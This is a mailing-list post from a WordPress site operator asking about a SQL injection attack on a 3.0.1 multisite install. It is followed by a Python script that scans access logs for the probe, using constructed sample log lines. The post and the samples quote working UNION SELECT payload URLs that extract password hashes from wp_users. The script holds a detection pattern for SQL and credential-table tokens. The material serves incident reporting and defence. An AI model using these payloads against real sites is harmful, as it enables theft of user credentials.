[wp-hackers] WP 3.0.1 Multiple Sites -- SQL Injection Vulnerability
Chuck Harris
charrisjr at gmail.com
Wed Oct 6 17:59:02 UTC 2010
Hello:
Any experience with or insight regarding the following would be helpful.
Thank you in advance,
Chuck Harris
------------
We are experimenting with the new multiple sites feature in WP 3.x. We
recently discovered that our site has a SQL injection vulnerability. One of
the attack sequences was as follows:
http://our_site_url.org/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/*
When changing the 1 to a 2 and using the URL:
http://our_site_url.org/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=2/*
returns a custom 'Not Found' page. This change shows that the server is
returning different data based upon the results of the SQL string it is
passed.
Has anyone else experienced something similar? Is there a remedy? Should we be
concerned? We are currently searching log files to determine whether or not
the attack was successful.
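
For the log search mentioned at the end of the message, the following is an added example, not part of the original post or of WordPress itself: it scans web access logs for requests whose `cat` parameter is anything other than a plain list of category IDs and records the status and size the server returned. The log lines are constructed samples reusing the URLs quoted above; the combined log format, the client addresses, the status codes and sizes, and the rule that a legitimate `cat` value is a comma-separated list of integers are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
# The two suspicious requests reuse the URLs quoted in the post.
SAMPLE_LOG = '''\
203.0.113.7 - - [06/Oct/2010:10:01:02 +0000] "GET /index.php?cat=5 HTTP/1.1" 200 18342 "-" "Mozilla/5.0"
203.0.113.9 - - [06/Oct/2010:10:02:10 +0000] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 200 9120 "-" "-"
203.0.113.9 - - [06/Oct/2010:10:02:11 +0000] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT%28666,CHAR%2858%29,user_pass,CHAR%2858%29,666,CHAR%2858%29%29,null,null,null+FROM+wp_users+where+id=2/* HTTP/1.1" 404 4210 "-" "-"
203.0.113.7 - - [06/Oct/2010:10:03:00 +0000] "GET /index.php?cat=3,-7 HTTP/1.1" 200 17650 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) (\d+|-)')
# Assumption: a legitimate cat value is a comma-separated list of category IDs.
VALID_CAT = re.compile(r'^-?\d+(,-?\d+)*$')
SQL_TOKENS = re.compile(
    r'\b(union|select|from|concat|char|wp_users|user_pass)\b|/\*|--', re.I)


def scan(log_text):
    """Return one record per request whose cat parameter is not a plain ID list."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, when, target, status, size = m.groups()
        # parse_qs decodes '+' and %XX, so raw and percent-encoded variants match alike.
        for value in parse_qs(urlsplit(target).query).get("cat", []):
            if VALID_CAT.match(value.strip()):
                continue
            tokens = sorted({t.group(0).lower() for t in SQL_TOKENS.finditer(value)})
            hits.append({"ip": ip, "time": when, "status": int(status),
                         "bytes": size, "cat": value, "tokens": tokens})
    return hits


def responses_by_client(hits):
    """Group distinct (status, bytes) pairs per client to expose differing responses."""
    out = {}
    for h in hits:
        out.setdefault(h["ip"], set()).add((h["status"], h["bytes"]))
    return out


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["time"], h["ip"], h["status"], h["bytes"], h["tokens"])
```

A flagged request shows only that the probe was sent; the status and size columns point to which responses need to be examined, they do not by themselves show that data was returned.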